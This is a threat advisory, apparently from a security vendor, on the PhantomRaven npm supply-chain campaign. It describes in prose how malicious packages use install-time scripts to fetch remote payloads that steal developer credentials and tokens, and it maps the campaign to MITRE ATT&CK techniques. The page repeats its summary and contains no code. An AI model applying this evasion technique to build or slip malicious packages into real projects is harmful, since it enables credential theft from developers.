EXECUTIVE SUMMARY
The PhantomRaven campaign shows how attackers abuse the open source npm ecosystem to target developers and development environments. In this campaign many malicious npm packages were uploaded that looked like normal libraries but secretly contained code designed to collect sensitive information from developer systems. These packages were downloaded thousands of times which increased the chance of developers unknowingly installing them in their projects. Once installed the packages attempted to collect credentials and tokens commonly used in development workflows such as source code repositories and automated build systems. This type of attack focuses on software supply chains where attackers target the tools and dependencies used to build applications rather than attacking the final application itself. Developers often trust packages published in open-source repositories and use automated tools to install dependencies which makes it easier for malicious packages to spread. Researchers observed that the campaign involved many packages published under different names which helped them avoid quick detection. Even after some packages were removed new ones were uploaded with similar behavior which allowed the activity to continue.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
The PhantomRaven campaign shows how attackers abuse the open source npm ecosystem to target developers and development environments. In this campaign many malicious npm packages were uploaded that looked like normal libraries but secretly contained code designed to collect sensitive information from developer systems. These packages were downloaded thousands of times which increased the chance of developers unknowingly installing them in their projects. Once installed the packages attempted to collect credentials and tokens commonly used in development workflows such as source code repositories and automated build systems. This type of attack focuses on software supply chains where attackers target the tools and dependencies used to build applications rather than attacking the final application itself. Developers often trust packages published in open-source repositories and use automated tools to install dependencies which makes it easier for malicious packages to spread. Researchers observed that the campaign involved many packages published under different names which helped them avoid quick detection. Even after some packages were removed new ones were uploaded with similar behavior which allowed the activity to continue.[emaillocker id="1283"]
The malicious npm packages used a method that allowed them to hide harmful code from normal package inspection. Instead of including the full malicious code inside the package the attackers used external sources to load additional code during installation. When a developer installed one of these packages the installation process triggered a script that downloaded the real payload from an attacker-controlled server. Because the main code was not stored directly in the npm package the package could appear harmless during basic review. Once the external payload was downloaded it executed on the developer system and began collecting different types of information. The malware searched for environment variables configuration files and authentication tokens used by development tools. It also gathered system details such as hostname operating system information and network related data to identify the infected machine. After collecting the information, the data was sent to attacker-controlled servers. This approach made detection more difficult because the harmful behavior happened after installation rather than during static package analysis.
The PhantomRaven campaign highlights the risks that exist in modern software development environments that rely heavily on open-source packages. When developers install third party dependencies, they may unknowingly introduce malicious code into their systems and development pipelines. In this campaign attackers focused on stealing credentials and tokens used by developers which could allow further access to code repositories and build systems. If such access is obtained attackers could potentially modify software code or gain deeper access into development infrastructure. The repeated publishing of malicious packages also showed that the activity continued even after earlier packages were detected and removed. This pattern suggests that attackers can quickly create new packages to replace the ones that were taken down. The campaign also shows that common security checks may not always detect threats that load code from external sources during installation. Because modern development workflows often include automated dependency downloads even a small malicious package can spread across many projects. Overall the activity demonstrates how supply chain attacks can target developers directly and why monitoring package behavior and dependencies is important in open-source environments.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub Technique |
| Initial Access | T1195.002 | Supply Chain Compromise | Compromise Software Supply Chain |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| T1204.002 | User Execution | Malicious File | |
| Credential Access | T1552.001 | Unsecured Credentials | Credentials In Files |
| Discovery | T1082 | System Information Discovery | — |
| T1016 | System Network Configuration Discovery | — | |
| Collection | T1119 | Automated Collection | — |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | — |
REFERENCES:
The following reports contain further technical details:
[/emaillocker]